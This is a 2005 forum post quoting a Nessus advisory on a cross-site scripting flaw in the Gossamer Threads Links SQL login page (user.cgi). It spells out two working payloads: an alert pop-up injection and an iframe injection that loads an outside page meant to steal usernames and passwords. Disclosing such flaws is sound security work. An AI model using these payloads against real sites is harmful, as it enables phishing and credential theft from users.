Gossamer Forum
Home : Products : Gossamer Forum : Development, Plugins and Globals :

XSS vulnerability is it a problem ?

Quote Reply
XSS vulnerability is it a problem ?
Hello, is the following a problem really ?
I didn t find anything in the forum.
It s from http://www.nessus.org

The URL variable in the Gossamer Threads Links SQL login page (user.cgi) is a hidden \
field in the login form and can be passed directly to user.cgi in the form of \
user.cgi?url="xyz" The URL variable is client side input created by the browser when \
a user clicks on a link which requires authentication. After authentication the user \
is redirected to the URL in the URL variable. This URL variable does not \
sufficiently validate the client side input and is therefore vulnerable to script \
injection and cross site scripting (XSS) attacks.


Exploit
This is a standard XSS vulnerability.

Note an attacker would normally obfuscate the linking code but for these examples I \
have made it simple for the sake of understanding.

Simple Example 1 (Pop up)
/user.cgi?url=">&lt;script&gt;alert("XSS Vulnerability")&lt;/script&gt;<"&from=rate

Resulting in the following within the HTML being injected:
<input type="hidden" name="url" value="">&lt;script&gt;alert("XSS \
Vulnerability")&lt;/script&gt;<"" />


Simple Example 2 (iframe to steal username and password)
/user.cgi?url="><iframe%20src="http://www.stationx.net/linksql.html"%20scrolling="No"% \
20align="MIDDLE"%20width="100%"%20height="3000"%20frameborder="No"></iframe><!--&from= \
rate regards
manne


http://www.edelsteine.de
Subject Author Views Date
Thread XSS vulnerability is it a problem ? manne 1944 Oct 14, 2005, 12:04 AM
Thread Re: [manne] XSS vulnerability is it a problem ?
brewt 1910 Oct 14, 2005, 12:41 AM
Thread Re: [brewt] XSS vulnerability is it a problem ?
SeanP 1906 Oct 14, 2005, 7:01 AM
Post Re: [SeanP] XSS vulnerability is it a problem ?
brewt 1909 Oct 14, 2005, 11:50 AM